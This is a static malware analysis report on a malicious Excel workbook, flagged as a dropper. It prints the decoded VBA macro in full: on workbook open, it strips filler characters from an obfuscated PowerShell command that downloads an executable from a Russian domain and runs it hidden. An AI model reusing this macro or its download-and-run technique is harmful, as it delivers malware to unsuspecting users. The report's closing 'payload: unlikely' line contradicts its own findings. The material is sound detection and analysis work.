Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 9c144853c3dd5089…

MALICIOUS

Office (OOXML) / .XLSX

45.3 KB
Created: 2021-10-08 10:35:53 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2026-06-13
MD5: 4e67956348b3804e6a5d7ec212f55a16
SHA-1: 3714b2061f308566a9ab783e79b8c35ba16a8fff
SHA-256: 9c144853c3dd50896d90666eb714cdd5b1b21e6f4ee93b9975d72f93b90d4789
310 Risk Score

Heuristics 7

  • ClamAV: Xls.Dropper.EPPlus-9802867-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.EPPlus-9802867-2
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set Pyvlftczrhh = CreateObject("WScript.Shell")
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
    Set Pyvlftczrhh = CreateObject("WScript.Shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Pyvlftczrhh = CreateObject("WScript.Shell")
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://pilkishop.ru/images.exe Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1309 bytes
SHA-256: 75289596d597084c96c1d589aadafb415b50f615fa0e102adf8bd1a173a9e11a
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim Lgbrafhdrsi As String, sOutput As String
Dim Pyvlftczrhh As Object, PyvlftczrhhExec As Object
Lgbrafhdrsi = "^p*o^*w*e*r*s^^*h*e*l^*l* *^-*W*i*n*^d*o*w^*S*t*y*^l*e* *h*i*^d*d*^e*n^* *-*e*x*^e*c*u*t*^i*o*n*pol^icy* *b*yp^^ass*;* $TempFile* *=* *[*I*O*.*P*a*t*h*]*::GetTem*pFile*Name() | Ren^ame-It^em -NewName { $_ -replace 'tmp$', 'exe' } –Pass*Thru; In^vo*ke-We^bRe*quest -U^ri ""https://pilkishop.ru/images.exe"" -Out*File $TempFile; St*art-Proce*ss $TempFile;"
Lgbrafhdrsi = Replace(Lgbrafhdrsi, "*", "")
Lgbrafhdrsi = Replace(Lgbrafhdrsi, "^", "")
Set Pyvlftczrhh = CreateObject("WScript.Shell")
Set PyvlftczrhhExec = Pyvlftczrhh.Exec(Lgbrafhdrsi)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 5120 bytes
SHA-256: c69b9a229b9c55eb00072c34d5138ab9cbc9a7d171e1e3fe582213fcaa3a910f
Detection
ClamAV: Xls.Dropper.EPPlus-9802867-2
Obfuscation or payload: unlikely